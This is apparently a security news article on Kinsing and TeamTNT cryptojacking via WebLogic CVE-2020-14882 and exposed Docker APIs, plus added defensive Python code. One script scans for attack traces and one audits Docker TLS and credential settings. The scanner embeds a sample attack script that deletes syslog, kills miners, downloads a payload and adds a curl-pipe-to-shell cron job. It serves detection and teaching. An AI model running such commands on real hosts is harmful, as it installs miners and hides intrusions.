Hackers Target WebLogic Servers and Docker APIs to Mine Cryptocurrencies – The Hacker News

Malicious actors like Kinsing use both recently discovered and legacy vulnerabilities in Oracle WebLogic Server to proliferate cryptocurrency-mining malware.

Cybersecurity firm Trend Micro said it found the financially motivated group using the vulnerability to drop Python scripts that disable operating system (OS) security features such as Security-Enhanced Linux (SELinux).

The operators behind the Kinsing malware have historically sought out vulnerable servers to co-opt into a botnet, including Redis, SaltStack, Log4Shell, Spring4Shell, and the Atlassian Confluence vulnerability (CVE-2022-26134).


The Kinsing actors have also been involved in campaigns against container environments, abusing misconfigured, openly exposed Docker daemon API ports to launch a crypto-miner and then spread the malware to other containers and hosts.

The latest wave of attacks involved the actor weaponizing CVE-2020-14882 (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.

It is worth noting that the vulnerability has been exploited by several botnets in the past to distribute Monero miners and the Tsunami backdoor on infected Linux systems.

Successful exploitation of the bug was followed by deployment of a shell script responsible for a number of actions: removing the /var/log/syslog system log, disabling security features and the cloud service agents of Alibaba and Tencent, and killing competing miner processes.

The shell script then proceeds to download the Kinsing malware from a remote server and also takes steps to ensure persistence using a cron job.
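A defender-side triage rule for a dropped script of the kind described above, added here as an example; it is not from the article and not from Trend Micro's analysis. The sample script, the 192.0.2.10 host (a documentation address) and the agent service names are constructed placeholders that mirror only the behaviours the article lists.

```python
import re

# Constructed sample of a post-exploitation script, modelled only on the
# behaviours the article describes (log wiping, cloud-agent disabling, miner
# killing, payload download, cron persistence). It is not the real Kinsing
# script; 192.0.2.10 is a documentation address and the service names are
# assumed placeholders.
SAMPLE_SCRIPT = """\
#!/bin/bash
rm -f /var/log/syslog
systemctl stop aliyun.service
systemctl stop tencent-agent.service
pkill -f xmrig
curl -fsSL http://192.0.2.10/kinsing -o /tmp/kinsing && chmod +x /tmp/kinsing
(crontab -l 2>/dev/null; echo "* * * * * curl -fsSL http://192.0.2.10/k.sh | sh") | crontab -
"""

# Each rule is (name, compiled regex). The agent and miner names are the ones
# the article mentions (Alibaba, Tencent, XMRig); extend them for your estate.
RULES = [
    ("log_wipe",             re.compile(r"\brm\b.*?/var/log/")),
    ("cloud_agent_disable",  re.compile(r"\b(systemctl|service)\b.*\b(stop|disable)\b.*(aliyun|tencent)", re.I)),
    ("miner_kill",           re.compile(r"\b(pkill|killall)\b.*(xmrig|miner)", re.I)),
    ("remote_payload_fetch", re.compile(r"\b(curl|wget)\b.*\bhttps?://")),
    ("cron_persistence",     re.compile(r"\bcrontab\b|/etc/cron")),
]


def scan_script(text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, rule_name, line) for every rule hit in the script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def matches_cryptojacking_chain(text: str) -> bool:
    """Triage verdict: the script fetches a remote payload, sets up cron
    persistence, and tampers with the host in at least one of the ways the
    article lists (log wipe, agent disable, competitor kill)."""
    hit = {name for _, name, _ in scan_script(text)}
    tampering = {"log_wipe", "cloud_agent_disable", "miner_kill"}
    return {"remote_payload_fetch", "cron_persistence"} <= hit and bool(hit & tampering)


if __name__ == "__main__":
    for lineno, name, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {name}: {line}")
    verdict = "cryptojacking chain" if matches_cryptojacking_chain(SAMPLE_SCRIPT) else "no match"
    print("verdict:", verdict)
```

Run it against shell history, cron spool entries or a file recovered from /tmp; a single rule hit is weak evidence on its own, which is why the verdict requires the download-plus-persistence pair together with at least one host-tampering action.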

“Successful exploitation of this vulnerability could lead to RCE, which allows attackers to perform a variety of malicious activities on affected systems,” said Trend Micro. “This can range from running malware […] to stealing critical data and even taking complete control of a compromised machine.”

TeamTNT actors are making a comeback with Kangaroo Attack

The development comes as researchers at Aqua Security identified three new attacks linked to another cryptojacking group, TeamTNT, which voluntarily shut down in November 2021 but appears to be very much alive.

“TeamTNT checked for a misconfigured Docker daemon and deployed Alpine, a vanilla container image, with a command line to download a shell script (k.sh) from a C2 server,” said Aqua Security researcher Assaf Morag.

What is notable about the attack chain is that it appears to be designed to break secp256k1, the elliptic curve behind the ECDSA keys used by Bitcoin and many other cryptocurrencies; if successful, this could give the actor the ability to compute the keys for each cryptocurrency wallet. In other words, the idea is to use the considerable, illicitly obtained processing power of its targets to run an ECDLP (elliptic curve discrete logarithm problem) solver and recover the key.


Two other attacks carried out by the group involve exploiting exposed Redis servers and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.

TeamTNT’s focus on Docker REST APIs has been well documented over the past year. Separately, in an operational security lapse uncovered by Trend Micro, credentials associated with two attacker-controlled DockerHub accounts were exposed.

The accounts – alpineos and sandeep078 – are said to have been used to proliferate a variety of malicious payloads such as rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners and even the Kinsing malware.

“The alpineos account was used three times in exploit attempts on our honeypots from mid-September to early October 2021, and we traced the IP addresses of the deployments to their location in Germany,” said Trend Micro’s Nitesh Surana.

“The threat actors were logged into their accounts in the DockerHub registry and likely forgot to log out.” Alternatively, “threat actors logged into their DockerHub account using alpineos’ credentials”.

Trend Micro said the malicious Alpineos image was downloaded more than 150,000 times and informed Docker of those accounts.

It also recommends that organizations configure any exposed Docker REST API with TLS to mitigate attacker-in-the-middle (AiTM) attacks, and use credential stores and credential helpers to hold user credentials.
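The two recommendations above (TLS on an exposed Engine API, credential stores instead of inline registry credentials) as a configuration audit, added here as an example that is not from the article, Trend Micro or Docker. The weak and hardened `daemon.json` and `~/.docker/config.json` fragments are constructed; the management address 10.0.0.5, the certificate paths and the example user:token pair are placeholders.

```python
import base64
import json

# Constructed daemon.json examples (not taken from the article). WEAK_DAEMON
# exposes the Engine API over plaintext TCP on every interface, the
# misconfiguration the article describes; HARDENED_DAEMON binds a management
# address (10.0.0.5 is a placeholder) and requires mutual TLS. Certificate
# paths are assumptions.
WEAK_DAEMON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed ~/.docker/config.json examples. WEAK_CLIENT keeps a
# base64-encoded user:token pair inline (the "auth" field); HARDENED_CLIENT
# delegates to a credential store (here the docker-credential-pass helper).
WEAK_CLIENT = json.dumps({
    "auths": {"https://index.docker.io/v1/": {
        "auth": base64.b64encode(b"example-user:example-token").decode()}},
})
HARDENED_CLIENT = json.dumps({
    "auths": {"https://index.docker.io/v1/": {}},
    "credsStore": "pass",
})

ALL_INTERFACES = ("tcp://0.0.0.0", "tcp://[::]", "tcp://:")


def audit_daemon_config(raw: str) -> list[str]:
    """Flag TCP listeners that lack TLS or client-certificate verification,
    or that bind every interface. A Unix-socket-only daemon yields nothing."""
    cfg = json.loads(raw)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    tls_on = bool(cfg.get("tls") or cfg.get("tlsverify"))
    verify_on = bool(cfg.get("tlsverify"))
    for host in tcp_hosts:
        if not tls_on:
            findings.append(f"{host}: Engine API served over plaintext TCP with no authentication")
        elif not verify_on:
            findings.append(f"{host}: TLS enabled but client certificates are not verified (set tlsverify)")
        if host.startswith(ALL_INTERFACES):
            findings.append(f"{host}: bound to all interfaces; bind a management address or firewall the port")
    if tcp_hosts and verify_on:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is not configured")
    return findings


def audit_client_config(raw: str) -> list[str]:
    """Flag registries whose credentials sit base64-encoded in config.json
    instead of being handled by a credential store or per-registry helper."""
    cfg = json.loads(raw)
    store = cfg.get("credsStore")
    helpers = cfg.get("credHelpers", {})
    findings = []
    for registry, entry in cfg.get("auths", {}).items():
        if entry.get("auth") and not store and registry not in helpers:
            findings.append(f"{registry}: credentials stored inline (base64, not encrypted); use a credential store or helper")
    return findings


if __name__ == "__main__":
    for label, raw, audit in [
        ("weak daemon.json", WEAK_DAEMON, audit_daemon_config),
        ("hardened daemon.json", HARDENED_DAEMON, audit_daemon_config),
        ("weak config.json", WEAK_CLIENT, audit_client_config),
        ("hardened config.json", HARDENED_CLIENT, audit_client_config),
    ]:
        print(f"{label}: {audit(raw) or ['ok']}")
```

The daemon check treats `tls` without `tlsverify` as a separate finding because server-side TLS alone encrypts the channel but still lets any client issue API calls; only `tlsverify` with a CA certificate turns the listener into a mutually authenticated endpoint. The client check mirrors the DockerHub incident in the article: an `auth` value in `config.json` is reversible base64, so a forgotten login on a shared or compromised host hands the registry credentials to whoever reads the file.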
